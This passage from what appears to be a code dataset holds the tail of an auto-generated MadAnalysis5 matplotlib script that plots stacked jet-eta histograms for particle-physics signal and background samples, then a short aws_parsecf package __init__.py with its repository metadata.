000180814219866,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_12
y5_ETA_12_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0121240822392,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0121753353338,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0121313846429,0.012170493784,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_13
y5_ETA_13_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0200482816269,0.010032919325,0.0200940397991,0.0100262832744,0.010040728874,0.0100696696577,0.0100271592661,0.0301165257319,0.0401877986198,0.0,0.0502017229729,0.010040728874,0.0,0.0301145712787,0.0402058597513,0.0,0.0100568562125,0.0401512714171,0.0,0.0301337191358,0.0100702894631,0.0,0.050140155629,0.0300994521571,0.0100355638284,0.0100184158769,0.0401671012489,0.0100262832744,0.0301196784758,0.0,0.0,0.0100367001384,0.0100153623019,0.0,0.0,0.0,0.0100369728528,0.0100609841169,0.0,0.0,0.0100568562125,0.0100602899348,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0100340928234,0.0100568562125,0.0,0.0,0.0100532489446,0.0200646444914,0.0301498340782,0.0200868128673,0.0301214387233,0.0301310828965,0.010045943504,0.0200609297906,0.0200572522781,0.0,0.0301088194839,0.010045943504,0.0,0.0301025759767,0.0200638924608,0.0201178403294,0.0300965762597,0.0100299566548,0.0200777058588,0.0100187051194,0.0301077410223,0.0301692711779,0.0100355638284,0.0100324441408,0.0200798255935,0.0,0.0100369728528,0.0200832055994,0.0,0.0,0.0100696696577,0.0,0.0100187051194,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_14
y5_ETA_14_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.027528906052,0.0275004145408,0.00549723253823,0.0164559054838,0.0110056171082,0.0770310847232,0.0440020169472,0.0550197773788,0.0330105907486,0.0549847571553,0.0880434418024,0.121014169624,0.0934786861076,0.088023372208,0.0990548644673,0.148394743497,0.170526224648,0.121020669897,0.0935958535372,0.15400569832,0.154120306267,0.159507367295,0.142959864833,0.132024495368,0.137438938798,0.0990098500734,0.09901927547,0.115524891795,0.126518641842,0.0935515297974,0.093431802885,0.0660046708025,0.0824784357877,0.0495015327065,0.0275040343806,0.0220225528175,0.0275192084565,0.0330340486105,0.0164733099661,0.0275217679392,0.0329655113519,0.0439578150875,0.0,0.0,0.0110062752609,0.0,0.00551642865838,0.0,0.0110014894345,0.0,0.0,0.0,0.00548486983059,0.0165070057588,0.0219859725285,0.0219787084729,0.0165035849898,0.00547500566556,0.0275132728943,0.0385051663,0.0440374840644,0.044009736022,0.0220046486267,0.0550118551704,0.0384934454944,0.0825167874013,0.0880206908452,0.110052636558,0.14301101386,0.0660153962538,0.131970543098,0.143017067239,0.0990156596928,0.176047841337,0.0880200814446,0.197998127364,0.170386184381,0.214440691037,0.143028077078,0.126557521602,0.0935057028693,0.131973996368,0.104504450001,0.0824594631145,0.0880294662144,0.0990419858005,0.0770282002268,0.0385437169845,0.093524188022,0.0329922193506,0.0439702062338,0.0494880040123,0.0274670884511,0.0164765154134,0.0165101502661,0.0110076159423,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_15
y5_ETA_15_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00295952505786,0.0019773310905,0.00197153430753,0.00295929337894,0.00592187756055,0.00987039584103,0.0108509548286,0.0207193705764,0.0266393081266,0.0276408104077,0.028623694201,0.0355146550268,0.040458795433,0.0621734434226,0.0641551399372,0.0779457675856,0.0908033063755,0.0967033828694,0.117432754119,0.134203862945,0.123367462203,0.14899303476,0.140128189568,0.162829477115,0.144093546658,0.165767390298,0.164779187509,0.149023096903,0.120400809611,0.122391324354,0.138132504136,0.112511982019,0.108561094842,0.0799076631682,0.0848781380123,0.0720595597606,0.0690840087744,0.0631659751599,0.0463968303938,0.0444055941589,0.0384984149825,0.0266470561431,0.0207270704935,0.0118380833966,0.0148115580909,0.010860875336,0.0138142124022,0.00690763529484,0.00591851861702,0.00691147924096,0.00493374291276,0.00296531542757,0.00591940043991,0.0108586988368,0.00493375092933,0.0167750008718,0.0177599809986,0.0217172092842,0.0335441777043,0.0325653743459,0.0473590594902,0.0463920204508,0.0789577395092,0.0641605511231,0.0838847645349,0.0897997117693,0.0967035432009,0.105586706258,0.125336612782,0.130288409015,0.145035774408,0.145060786111,0.146026061505,0.141099958385,0.141132024672,0.156908918281,0.165768232038,0.161842396647,0.146058288123,0.12731750764,0.127304761291,0.111518849039,0.113462226341,0.0838649636029,0.0779592755088,0.0710697937405,0.0680979704601,0.060191185748,0.0444233508651,0.0375124688587,0.0276394556071,0.0197401022569,0.0167707320474,0.0128311522443,0.0118483686581,0.00395132367973,0.0098704038576,0.00296028903714,0.00395140384545,0.000988171524021,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_16
y5_ETA_16_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000504683064297,0.000503673995848,0.00176456904041,0.000504662658869,0.000755176904892,0.00201613916733,0.00327593912055,0.0052941964514,0.00680464228566,0.00655437570553,0.00806682207201,0.0118487722101,0.0141165835315,0.0199132536595,0.0214233514011,0.0251999881257,0.029492214016,0.0378149801786,0.0436050805587,0.0504108511445,0.0637772070879,0.0569611137558,0.064279780791,0.0688137469931,0.0799062179993,0.0819233146213,0.0809142061613,0.0756257192288,0.0680646276998,0.0690648537968,0.0690643736691,0.0655375153948,0.0534379364608,0.0544486453466,0.0458824064113,0.0415930252778,0.0373026518803,0.0315083103719,0.0287376892846,0.023186516468,0.0178977894717,0.0121010153161,0.0110908625782,0.00630208858785,0.00605014556172,0.00277111641911,0.00252142599225,0.00252007683333,0.000756169568977,0.000252086144206,0.00050443299777,0.000505573301133,0.00226871956303,0.00176499515377,0.00428539607331,0.00680943556085,0.00882158686726,0.00907575848628,0.0128560761901,0.0158825493435,0.0214315455811,0.0249591480534,0.0294984396722,0.0345365199873,0.0410879709147,0.0509199465827,0.0496597713296,0.0557024989179,0.062018579228,0.0660450104071,0.0710827906424,0.082936744231,0.0829245809951,0.0801550842069,0.0826753146811,0.0796696750701,0.0736030611272,0.0688247099097,0.0622641245521,0.0549595812744,0.0529467657913,0.0496584109677,0.0289897043299,0.0320075591905,0.0259642514479,0.0209242226145,0.015627597517,0.0128580087043,0.00933110641825,0.00730933655294,0.00554803598207,0.00478858594036,0.00403263282897,0.00378057657272,0.00252240785346,0.00277570443969,0.00100821822321,0.00126129195015,0.000251611017805,0.000756474450087,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_17
y5_ETA_17_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00028397803684,0.000287149347103,0.000572588866082,0.00086141364879,0.000858296726698,0.00142988101127,0.000286470894662,0.00143133869423,0.00114646765162,0.00314968296684,0.00143539981097,0.00458093168064,0.0057261476045,0.00572488787848,0.00887590355546,0.00687069867296,0.0114469703671,0.0160359123056,0.0146129317935,0.0186010244123,0.0286497888791,0.0243326878172,0.0300785281387,0.0352288279859,0.0400557281701,0.0372345617533,0.0437990640218,0.0463780331148,0.0437855069704,0.0435079573354,0.0406790925929,0.0394877616987,0.0380785181989,0.0357858868296,0.032346174942,0.0226292083116,0.0206155562663,0.015179688528,0.020604168743,0.0111674111692,0.00916546857718,0.0054315786711,0.00257291540959,0.0037264495243,0.00114227456358,0.000287273220162,0.00114801731457,0.0,0.000287273220162,0.0,0.0,0.0,0.000287793407025,0.000861278578167,0.00114297141202,0.00171339134983,0.00372279431928,0.00372059779701,0.0065844659265,0.00831201019817,0.0151661214788,0.0157296089243,0.016317561049,0.0266210901063,0.0269072278734,0.0346329275899,0.0317871765201,0.0352405254418,0.0412565470008,0.0455105017965,0.0466690198273,0.0443771182992,0.0406805422776,0.0377842721953,0.0446466596759,0.0363888956796,0.0366208952214,0.0303472696893,0.030643575245,0.0248930259477,0.0194702853544,0.0188994395092,0.018906557961,0.0114497397648,0.00829914699583,0.00743626066733,0.00657748444492,0.00430174740119,0.00487046270975,0.0031525963332,0.00228915312583,0.00114443609346,0.0025791100623,0.00114010603522,0.00200939997011,0.000284795359079,0.000568850879067,0.000572936090563,0.000571773843343,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_18
y5_ETA_18_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,2.1618685923e-05,8.6306915748e-05,0.00012954796737,0.000129536567609,0.0,0.00021618782318,8.64075018695e-05,0.00028070459977,0.000151293094238,0.000343869582707,0.000475242601431,0.000451927157561,0.000626455813524,0.000691292370159,0.000842881522882,0.00116484261009,0.00148856018245,0.00172800754039,0.00219831806899,0.00239747607504,0.00293766294407,0.00323993555532,0.00427716497209,0.0039507244496,0.00449213846932,0.00535521349432,0.00686507404534,0.00835788524876,0.00760034602072,0.00800891846434,0.00731679374403,0.00745136540142,0.00660820642848,0.00587277519175,0.00518380216991,0.0038003029341,0.00341139507724,0.00239798235851,0.00164156424662,0.00140402257659,0.000907128812487,0.000885176310565,0.000280894414163,0.000194330836162,0.00015137138377,6.48865144083e-05,0.0,2.15796710811e-05,0.0,0.0,0.0,0.0,6.48430528216e-05,0.000129661629687,0.000129611588091,0.000237677712765,0.000539844038006,0.000734505844419,0.00138271382584,0.00157626792759,0.00254851032765,0.00319534572763,0.00494570643798,0.00468611880475,0.00554973867125,0.0064568704175,0.00708366026077,0.008572385153,0.0082268802076,0.00800945911475,0.00751491906589,0.00720902828803,0.00658465251168,0.00541949221709,0.00516276709723,0.00406114286454,0.00349812085037,0.00246263031617,0.00222270643149,0.00216037656483,0.0013609738121,0.00146885158926,0.00127432222124,0.00120975179872,0.000820848132953,0.000799510044589,0.000583198751945,0.000151295189783,0.000323900722923,0.000302215444797,0.000365619529328,0.000194625553498,0.000172684325603,0.000172933318165,0.00010811381926,0.000108022872642,8.64117767797e-05,4.32329628209e-05,4.32184197442e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_19
y5_ETA_19_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,2.84378672588e-05,0.0,2.84059927191e-05,2.84059927191e-05,5.66202034917e-05,2.84378672588e-05,0.000227067626323,0.000142116318942,0.000112807263774,0.000312132692837,0.000197686756896,0.000113550448522,0.000396911244965,0.000367363427809,0.000339191295587,0.00067976703938,0.000312547388619,0.000509888813246,0.00079511796866,0.000766209424659,0.000766636002842,0.00110922269441,0.00129734634674,0.00142008471303,0.00121819143778,0.00155774856277,0.00207208273063,0.0015581956381,0.00175813485257,0.00116410141327,0.00118541249883,0.000852022042703,0.000625733307743,0.000568403546697,0.000224870273383,8.52734838212e-05,5.67168816739e-05,2.84575177789e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,2.82249494922e-05,0.0,2.61934006008e-05,2.84059927191e-05,0.000283024078914,0.000310853552407,0.000424200811878,0.000452441267903,0.000852991943656,0.00084993786963,0.00096418269594,0.00144583045904,0.00127490925519,0.00204266784783,0.0013638726403,0.00150032092045,0.00135943604895,0.00141977235442,0.000965568183855,0.00113252734974,0.000737446885655,0.000680515779151,0.000482830804615,0.00039718855049,0.000283947787034,0.000281869258102,0.0002823934205,0.000168857379389,0.000227286708085,0.000170511855148,0.000141927344213,0.000198385887644,5.68226944517e-05,8.50737555193e-05,0.00011367724859,0.000113689145844,5.68953850377e-05,2.84575177789e-05,0.0,8.52219587614e-05,0.0,0.0,2.83770739265e-05,2.84575177789e-05,0.0,2.83770739265e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating a new Canvas
fig = plt.figure(figsize=(12,6),dpi=80)
frame = gridspec.GridSpec(1,1,right=0.7)
pad = fig.add_subplot(frame[0])
# Creating a new Stack
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights+y5_ETA_18_weights+y5_ETA_19_weights,\
label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights+y5_ETA_18_weights,\
label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights,\
label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights,\
label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights,\
label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights,\
label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights,\
label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights,\
label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights,\
label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights,\
label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights,\
label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights,\
label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights,\
label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights,\
label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights,\
label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#758991", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights,\
label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#688296", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights,\
label="$signal\_2pt4TeVL$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#6d7a84", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights,\
label="$signal\_2pt2TeVL$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7c99d1", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights,\
label="$signal\_2TeVL$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7f7f9b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights,\
label="$signal\_1pt8TeVL$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#aaa5bf", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
# Axis
plt.rc('text',usetex=False)
plt.xlabel(r"\eta [ j_{2} ] ",\
fontsize=16,color="black")
plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 40.0\ \mathrm{fb}^{-1})$ ",\
fontsize=16,color="black")
# Boundary of y-axis
ymax=(y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights+y5_ETA_18_weights+y5_ETA_19_weights).max()*1.1
ymin=0 # linear scale
#ymin=min([x for x in (y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights+y5_ETA_18_weights+y5_ETA_19_weights) if x])/100. # log scale
plt.gca().set_ylim(ymin,ymax)
# Log/Linear scale for X-axis
plt.gca().set_xscale("linear")
#plt.gca().set_xscale("log",nonposx="clip")
# Log/Linear scale for Y-axis
plt.gca().set_yscale("linear")
#plt.gca().set_yscale("log",nonposy="clip")
# Legend
plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.)
# Saving the image
plt.savefig('../../HTML/MadAnalysis5job_0/selection_4.png')
plt.savefig('../../PDF/MadAnalysis5job_0/selection_4.png')
plt.savefig('../../DVI/MadAnalysis5job_0/selection_4.eps')
# Running!
if __name__ == '__main__':
selection_4()
| 206.729358 | 1,918 | 0.768944 | 8,926 | 45,067 | 3.77728 | 0.185301 | 0.198363 | 0.287312 | 0.370032 | 0.329072 | 0.32495 | 0.322547 | 0.318217 | 0.313709 | 0.313145 | 0 | 0.594637 | 0.041738 | 45,067 | 217 | 1,919 | 207.682028 | 0.186079 | 0.032951 | 0 | 0.171875 | 0 | 0.007813 | 0.02687 | 0.004593 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007813 | false | 0 | 0.03125 | 0 | 0.039063 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ffceb19ef7da19ffa35d2711e8eb8ba1e9dd5427 | 161 | py | Python | aws_parsecf/__init__.py | PritamDutt/aws-parsecf | 0a2f89b6af1ea49a05f8d888b1cc77fc958b69db | [
"MIT"
] | null | null | null | aws_parsecf/__init__.py | PritamDutt/aws-parsecf | 0a2f89b6af1ea49a05f8d888b1cc77fc958b69db | [
"MIT"
] | 1 | 2021-02-23T18:49:41.000Z | 2021-02-23T18:49:41.000Z | aws_parsecf/__init__.py | PritamDutt/aws-parsecf | 0a2f89b6af1ea49a05f8d888b1cc77fc958b69db | [
"MIT"
] | null | null | null | from aws_parsecf.common import UnknownValue
from aws_parsecf.loaders import load_json, loads_json, load_yaml
__all__ = ['load_json', 'loads_json', 'load_yaml']
